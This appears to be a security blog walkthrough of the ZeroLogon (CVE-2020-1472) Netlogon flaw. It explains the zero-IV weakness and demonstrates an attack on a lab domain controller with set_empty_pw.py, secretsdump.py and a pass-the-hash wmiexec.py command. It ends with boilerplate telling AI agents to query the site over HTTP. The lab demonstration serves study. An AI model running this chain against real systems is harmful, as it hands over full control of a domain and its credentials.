# ZeroLogon Exploit

## Introduction

[CVE-2020-1472](https://nvd.nist.gov/vuln/detail/CVE-2020-1472), a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a [patch ](https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Aug)([KB4565349](https://support.microsoft.com/en-us/help/4565349/windows-10-update-kb4565349)) fixed in August 2020.\
\
This vulnerability was discovered by secure security researcher [Tom Tervoor](https://www.secura.com/blog/zero-logon) on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8)  that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC.\
\
ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.

The following diagram is the authentication handshake process of  MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8. &#x20;

Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number,  but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256.  It can easy to pass the step 4 validation.\
\
The attack details can be referenced to the [Whitepaper ](https://www.secura.com/pathtoimg.php?id=2055)by Tom Tervoor

![](/files/-MJ0Ej0g0sIm3qMVUult)

## Exploitation Demo

Many PoC exploits have been released ([1](https://github.com/dirkjanm/CVE-2020-1472), [2](https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472), [3](https://github.com/risksense/zerologon), [4](https://github.com/bb00/zer0dump), [5](https://github.com/gentilkiwi/mimikatz/releases), ... etc)

### Target Environment&#x20;

Host Name:               FKCLAI-WIN2016\
OS Name:                   Microsoft Windows Server 2016 Standard\
OS Version:                10.0.14393 N/A Build 14393\
Domain:                      FKCLAI.local\
Logon Server:             \\\FKCLAI-WIN2016<br>

![](/files/-MJ2YecxGhCX4VOe_Q1z)

### Tools Setup

Using the [RiskSense](https://github.com/risksense/zerologon)'s ZeroLogon exploitation script with the latest updated of the [impacket](https://github.com/SecureAuthCorp/impacket/commit/b867b21) on this demo.

```
root@kclai:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
root@kclai:~/Documents/ctf/expoit# 
```

Remove all impacket scripts

```
root@kclai:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
  erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
  erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
  erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
  erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
  ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
  gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
  guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
  keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
  libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
  libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
  libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0

```

get the latest impacket from the  <https://github.com/SecureAuthCorp/impacket.git>

```
root@kclai:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.

```

```
root@kclai:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin

Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
root@kclai:~/Documents/ctf/tools/win/impacket# 

```

### Start Exploit

> python3 set\_empty\_pw\.py fkclai-win2016 192.168.1.169

![](/files/-MJ2c3XobbUvIlrUt-1m)

> secretsdump.py -just-dc administrator/fkclai-win2016\\$@192.168.1.169

![](/files/-MJ2i54E3CALPmCcmAmQ)

> wmiexec.py fkclai/administrator\@192.168.1.169 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

![](/files/-MJ2kQOZho_FBY6q63vH)

## mimikatz [Coding](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_lsadump.c)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://calvin-lai.gitbook.io/calvin-lai-security/exploit-cve-poc/zerologon-exploit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.